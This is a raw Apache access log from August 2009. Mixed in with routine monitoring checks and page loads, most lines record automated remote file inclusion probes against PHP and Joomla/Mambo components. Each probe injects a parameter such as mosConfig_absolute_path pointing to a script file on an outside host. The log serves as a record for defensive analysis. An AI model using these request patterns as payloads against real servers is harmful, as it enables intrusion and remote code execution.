209.59.12.99 - - [05/Aug/2009:06:28:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [05/Aug/2009:06:28:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:28:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:28:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.93.147.154 - - [05/Aug/2009:06:29:13 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/rebon121/new.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:06:30:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:30:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:30:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:31:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:31:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:31:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [05/Aug/2009:06:33:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.182 - - [05/Aug/2009:06:34:03 -0400] "GET /logs/access_log.Q108062800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [05/Aug/2009:06:34:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:34:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:34:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
119.152.70.123 - - [05/Aug/2009:06:34:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
119.152.70.123 - - [05/Aug/2009:06:34:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
119.152.70.123 - - [05/Aug/2009:06:34:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
119.152.70.123 - - [05/Aug/2009:06:34:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
67.15.48.60 - - [05/Aug/2009:06:35:27 -0400] "GET /logs/access_log.Q109062800/?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:06:35:27 -0400] "GET /?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:06:35:27 -0400] "GET /logs/?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 200 12406 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:06:35:27 -0400] "GET /logs/access_log.Q109072000/?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:06:36:03 -0400] "GET /logs/access_log.Q109070700/?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
116.122.38.203 - - [05/Aug/2009:06:37:52 -0400] "GET /logs/access_log.Q109062000///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
116.122.38.203 - - [05/Aug/2009:06:37:53 -0400] "GET /logs/access_log.Q109062000///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
116.122.38.203 - - [05/Aug/2009:06:37:53 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
116.122.38.203 - - [05/Aug/2009:06:37:54 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
116.122.38.203 - - [05/Aug/2009:06:37:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 200 12412 "-" "libwww-perl/5.79"
116.122.38.203 - - [05/Aug/2009:06:37:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 200 12412 "-" "libwww-perl/5.79"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs/access_log.Q109070700%20%20//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs/access_log.Q109070700%20%20//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs/access_log.Q109070700//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs/access_log.Q109070700//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:08 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:18 -0400] "GET /logs/access_log.Q109062200//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:18 -0400] "GET /logs/access_log.Q109062200//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:18 -0400] "GET /logs/access_log.Q109062200%20%20//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:19 -0400] "GET /logs/access_log.Q109062200%20%20//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:06:38:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.142.209.134 - - [05/Aug/2009:06:38:59 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:59 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:38:59 -0400] "GET /logs/access_log.Q109070700//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:39:00 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:39:00 -0400] "GET /logs/access_log.Q109070700//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:39:00 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:39:00 -0400] "GET /logs/access_log.Q109062200//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:06:39:00 -0400] "GET /logs/access_log.Q109062200//includes/file_includer.php?gzip=0&file=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
60.251.217.4 - - [05/Aug/2009:06:40:28 -0400] "GET /logs/access_log.Q109071400%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Aug/2009:06:41:49 -0400] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/lena121/cinta.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
65.111.165.164 - - [05/Aug/2009:06:42:29 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.111.165.164 - - [05/Aug/2009:06:42:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
65.111.165.164 - - [05/Aug/2009:06:42:29 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.133.233.26 - - [05/Aug/2009:06:42:31 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/aid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
174.133.233.26 - - [05/Aug/2009:06:42:32 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/aid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
174.133.233.26 - - [05/Aug/2009:06:42:32 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/aid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
65.111.165.164 - - [05/Aug/2009:06:42:47 -0400] "GET /logs/access_log.Q109070900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.205.32 - - [05/Aug/2009:06:42:58 -0400] "GET /logs/access_log.Q109050900//?option=com_akocomment&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:42:58 -0400] "GET //?option=com_akocomment&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:42:58 -0400] "GET /logs//?option=com_akocomment&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:43:05 -0400] "GET /logs/access_log.Q109061100//?option=com_akocomment&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
209.59.12.99 - - [05/Aug/2009:06:43:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.133.233.26 - - [05/Aug/2009:06:44:23 -0400] "GET /logs/error_log.Q109071900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/aid.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.820"
116.122.38.203 - - [05/Aug/2009:06:44:28 -0400] "GET /logs/error_log.Q109062000///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
116.122.38.203 - - [05/Aug/2009:06:44:28 -0400] "GET /logs/error_log.Q109062000///?_SERVER[DOCUMENT_ROOT]=http://www.82movie.com/shop/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
65.111.165.164 - - [05/Aug/2009:06:44:49 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.111.165.164 - - [05/Aug/2009:06:44:54 -0400] "GET /logs/access_log.Q109070900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:06:44:58 -0400] "GET /?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:06:44:58 -0400] "GET /logs/?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 200 12406 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:06:44:58 -0400] "GET /logs/access_log.Q109071100%20%20/?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:45:00 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:45:00 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:45:00 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
174.133.233.26 - - [05/Aug/2009:06:45:08 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.investment.kg/en/installationx/aid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
89.108.88.84 - - [05/Aug/2009:06:45:46 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:45:46 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:45:47 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:06:45:49 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:45:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:45:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.201.178 - - [05/Aug/2009:06:45:49 -0400] "GET /logs/access_log.Q109053100%20%20/?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:06:46:00 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.108.88.84 - - [05/Aug/2009:06:46:17 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
94.23.205.32 - - [05/Aug/2009:06:46:53 -0400] "GET //?option=com_pollxt&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:46:53 -0400] "GET /logs/access_log.Q109051700//?option=com_pollxt&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:06:46:53 -0400] "GET /logs//?option=com_pollxt&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
172.16.1.180 - - [05/Aug/2009:06:46:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:46:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:06:46:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.205.32 - - [05/Aug/2009:06:46:59 -0400] "GET /logs/access_log.Q109053100//?option=com_pollxt&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
217.67.239.230 - - [05/Aug/2009:06:47:26 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.813"
206.176.241.116 - - [05/Aug/2009:06:47:44 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
206.176.241.116 - - [05/Aug/2009:06:47:44 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.108.88.84 - - [05/Aug/2009:06:48:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
206.176.241.116 - - [05/Aug/2009:06:48:11 -0400] "GET /logs/access_log.Q109071600/index.php?_SERVER[DOCUMENT_ROOT]=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
206.176.241.116 - - [05/Aug/2009:06:48:31 -0400] "GET /logs/access_log.Q109071600%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:06:48:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.176.241.116 - - [05/Aug/2009:06:48:42 -0400] "GET /logs/access_log.Q109071700%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.67.239.230 - - [05/Aug/2009:06:49:39 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.813"
94.23.205.32 - - [05/Aug/2009:06:49:42 -0400] "GET /logs/error_log.Q109051300%20//?option=com_akocomment&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
91.121.177.8 - - [05/Aug/2009:06:50:16 -0400] "GET /logs/access_log.Q109052800//index.php?str=http://radio-rendevous.de//sb/master-id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.177.8 - - [05/Aug/2009:06:50:16 -0400] "GET //index.php?str=http://radio-rendevous.de//sb/master-id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.121.177.8 - - [05/Aug/2009:06:50:16 -0400] "GET /logs//index.php?str=http://radio-rendevous.de//sb/master-id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:50:30 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:50:55 -0400] "GET /logs/access_log.Q109071600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:50:55 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:50:56 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:06:51:04 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
72.55.179.121 - - [05/Aug/2009:06:51:20 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.55.179.121 - - [05/Aug/2009:06:51:20 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.55.179.121 - - [05/Aug/2009:06:51:20 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.177.8 - - [05/Aug/2009:06:51:25 -0400] "GET /logs/error_log.Q109052800//index.php?str=http://radio-rendevous.de//sb/master-id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.67.239.230 - - [05/Aug/2009:06:51:52 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
193.34.16.183 - - [05/Aug/2009:06:52:02 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
193.34.16.183 - - [05/Aug/2009:06:52:02 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
193.34.16.183 - - [05/Aug/2009:06:52:02 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Aug/2009:06:52:05 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Aug/2009:06:52:05 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Aug/2009:06:52:05 -0400] "GET /logs/access_log.Q109060600%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Aug/2009:06:52:09 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Aug/2009:06:52:09 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Aug/2009:06:52:09 -0400] "GET /logs/access_log.Q109060600%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
206.176.241.116 - - [05/Aug/2009:06:52:37 -0400] "GET /logs/access_log.Q109071700/index.php?_SERVER[DOCUMENT_ROOT]=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.108.88.84 - - [05/Aug/2009:06:52:41 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
